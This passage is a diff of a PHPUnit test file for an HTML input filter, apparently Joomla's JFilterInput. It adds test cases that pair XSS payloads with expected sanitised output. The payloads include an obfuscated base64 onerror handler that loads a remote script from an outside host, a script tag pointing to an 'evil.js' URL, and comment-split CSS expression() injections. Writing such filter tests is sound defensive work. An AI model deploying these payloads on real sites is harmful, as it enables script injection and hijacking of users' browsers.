),
'security_20110329a' => array(
'string',
"<img src='<img src='///'/> ",
'<img /> ',
'From specific cases'
),
'security_20110329b' => array(
'string',
"<img src='<img src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
'<img /> ',
'From specific cases'
),
'hanging_quote' => array(
'string',
"<img src=\' />",
'<img />',
'From specific cases'
),
'hanging_quote2' => array(
'string',
'<img src slkdjls " this is "more " stuff',
'img src slkdjls " this is "more " stuff',
'From specific cases'
),
'hanging_quote3' => array(
'string',
"<img src=\"\'\" />",
'<img />',
'From specific cases'
),
);
$tests = array_merge($this->casesGeneric(), $casesSpecific);
@ -954,7 +1014,7 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'security_tracker_24802_e' => array(
'',
'<img src=<img src=x"/onerror=alert(1)//">',
'<img src=<img src="x/onerror=alert(1)//" />',
'img src=<img src="x/onerror=alert(1)//" />',
'From specific cases'
),
'empty_alt' => array(
@ -1023,6 +1083,60 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<p class="my_class">This is a <a href="http://mysite.com" img="my_image">link test</a>. This is <span class="myclass" font="myfont"> some more</span> text.</p>',
'Test valid nested tag'
),
'hanging_quote' => array(
'string',
"<img src=\' />",
'<img src="" />',
'From specific cases'
),
'hanging_quote2' => array(
'string',
'<img src slkdjls " this is "more " stuff',
'img src slkdjls " this is "more " stuff',
'From specific cases'
),
'hanging_quote3' => array(
'string',
"<img src=\"\' />",
'img src="\\\' /&gt;"',
'From specific cases'
),
'tracker25558a' => array(
'string',
'<SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
'SCRIPT SRC=http://jeffchannell.com/evil.js#<B />',
'Test mal-formed element from 25558a'
),
'tracker25558b' => array(
'string',
'<IMG STYLE="xss:expression(alert(\'XSS\'))" />',
'<IMG STYLE="xss(alert(\'XSS\'))" />',
'Test mal-formed element from 25558b'
),
'tracker25558c' => array(
'string',
'<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))" />',
'<IMG STYLE="xss(alert(\'XSS\'))" />',
'Test mal-formed element from 25558b'
),
'tracker25558d' => array(
'string',
'<IMG STYLE="xss:expr/*XSS*/ess/*another comment*/ion(alert(\'XSS\'))" />',
'<IMG STYLE="xss(alert(\'XSS\'))" />',
'Test mal-formed element from 25558b'
),
'tracker25558e' => array(
'string',
'<b><script<b></b><alert(1)</script </b>',
'<b>script<b></b>alert(1)/script</b>',
'Test mal-formed element from 25558e'
),
'security_20110329a' => array(
'string',
"<img src='<img src='///'/> ",
"<img src=\"'&lt;img\" src=\"'///'/\" /> ",
'From specific cases'
),
);
$tests = array_merge($this->casesGeneric(), $casesSpecific);
@ -1112,7 +1226,14 @@ class JFilterInputTest extends PHPUnit_Framework_TestCase
'<img class="one two" />',
'',
'From specific cases'
)
),
'security_20110328' => array(
'string',
"<img src='<img
src='/onerror=eval(atob(/KGZ1bmN0aW9uKCl7dHJ5e3ZhciBkPWRvY3VtZW50LGI9ZC5ib2R5LHM9ZC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cDovL2hhLmNrZXJzLm9yZy94c3MuanMnKTtiLmFwcGVuZENoaWxkKHMpO31jYXRjaChlKXt9fSkoKTs=/.source))//'/> ",
' ',
'From specific cases'
),
);
$tests = array_merge($this->casesGeneric(), $casesSpecific);